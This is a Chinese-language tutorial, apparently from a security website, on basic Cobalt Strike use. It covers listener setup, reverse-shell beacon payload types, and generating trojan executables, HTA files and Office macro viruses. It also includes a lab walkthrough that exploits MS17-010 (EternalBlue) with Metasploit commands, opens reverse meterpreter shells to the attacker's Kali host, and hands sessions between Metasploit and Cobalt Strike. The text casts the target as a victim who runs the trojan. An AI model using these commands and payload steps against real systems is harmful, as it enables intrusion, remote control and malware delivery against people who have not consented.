​Cobalt Strike基础使用

华盟原创文章投稿奖励计划

文章作者:华盟安全团队-- Gaowu

Cobalt Strike分为客户端组件和服务器组件,服务器的组件也是团队服务器,可以放在局域网或者公网下进行团队使用,也是Cobalt Strike社会工程功能的托管机器,团队服务器还可以存储由Cobalt Strike收集的数据,并且进行日志管理。

Cobalt Strike服务器必须在Linux系统上运行,这里演示服务器在Linux KALI端,本地进行Cobalt Strike客户端的连接。

Cobalt Strike基础使用

CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包。

CS使用

启动CS服务端

Cobalt Strike基础使用

Cobalt Strike基础使用

启动客户端

服务端启动后客户端启动进行连接(团队多人连接将用户名设置为自己的用来区分团队成员)

Cobalt Strike基础使用

主界面

Cobalt Strike基础使用

CS功能使用(主机上线)

1.设置监听器用来接收会话

Cobalt Strike基础使用

name:监听器名字

payload:payload类型

Host: shell反弹的主机,kali IP

Port: 反弹端口

Cobalt Strike基础使用

这里Payload有9种选项,如下:

内部的Listener

windows/beacon_dns/reverse_dns_txt

windows/beacon_dns/reverse_http

windows/beacon_http/reverse_http

windows/beacon_https/reverse_https 

windows/beacon_smb/bind_pipe

外部的Listener

windows/foreign/reverse_dns_txt

windows/foreign/reverse_http

windows/foreign/reverse_https

windows/foreign/reverse_tcp

Beacon为内置的监听器,在目标主机执行相应的payload,获取shell到cs上;其中包含DNS、HTTP、HTTPS等,Beacon可以选择通过DNS还是HTTP/S协议出口网络,甚至可以在使用Beacon通讯过程中切换HTTP和DNS。其支持多主机连接,部署好Beacon后提交一个要连回的域名或主机的列表,Beacon将通过这些主机轮询。目标网络的防护团队必须拦截所有的列表中的主机才可中断和其网络的通讯。通过种种方式获取shell以后(比如直接运行生成的exe),就可以使用Beacon了。

Foreign为外部结合的Listener,经常用于MSF的结合,例如获取meterpreter到MSF上。

2.生成木马

HTML Application 生成恶意的HTA木马文件;
MS Office Macro 生成office宏病毒文件;
Payload Generator 生成各种语言版本的payload;
Windows Executable 生成可执行exe木马;
Windows Executable(S) 生成无状态的可执行exe木马

Cobalt Strike基础使用

Cobalt Strike基础使用

生成后会保存到指定地方,通过某种方式上传到对方机器上,可以通过Webshell方式等这里不在讲解了

受害者运行exe文件我们的CS就直接上线了

Cobalt Strike基础使用

这是生成exe文件,还可以生成宏病毒等上面介绍到的。

3.正常我们进去需要调整响应的时间,sleep 3 就行。

Cobalt Strike基础使用

Cobalt Strike基础使用

可以对我们上线的机器进行以下操作,也可以联动MSF进行使用

Cobalt Strike基础使用

联动MSF使用

将MSF的会话转发到CS上

通过漏洞复现演示MSF获取目标Session

KALI:192.168.50.218

CS:192.168.50.130

受害者IP:192.168.50.185

1.发现漏洞

Nmap -A扫描目标开放了445端口

Cobalt Strike基础使用

通过使用MSF辅助模块扫描发现存在ms17_010漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.50.185

exploit

Cobalt Strike基础使用

查找漏洞利用模块

Cobalt Strike基础使用

漏洞利用

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set RHOST 192.168.50.185

Run

Cobalt Strike基础使用

获取后 我们background获取session

Cobalt Strike基础使用

与CS联动,将会话转发到CS中

CS配置新建一个监听

Cobalt Strike基础使用

KALI中配置

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set DisablePayloadHandler true

set lhost 192.168.50.218  //KALI IP

set lport 4443 与CS同端口

set session 1

Cobalt Strike基础使用

CS这边就接收到了MSF的会话

Cobalt Strike基础使用

CS的会话转发到MSF中

由于生成的木马就是HTTP的,所以委派给msf时,监听器还是HTTP的

CS添加一个监听器

Cobalt Strike基础使用

MSF准备

Use exploit/multi/handler

Set payload windows/meterpreter/reverse_http

Set lhost ip

Set lport ip

Cobalt Strike基础使用

设置完成后我们就可以使用CS进行委派会话了

Cobalt Strike基础使用

选中我们刚刚创建的就行

Cobalt Strike基础使用

这样我们的MSF端就会获取到这个会话

CS还有非常多的功能,大家慢慢发现

注:本文是原创文章转载本文须注明来源及作者

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/285103.html

发表评论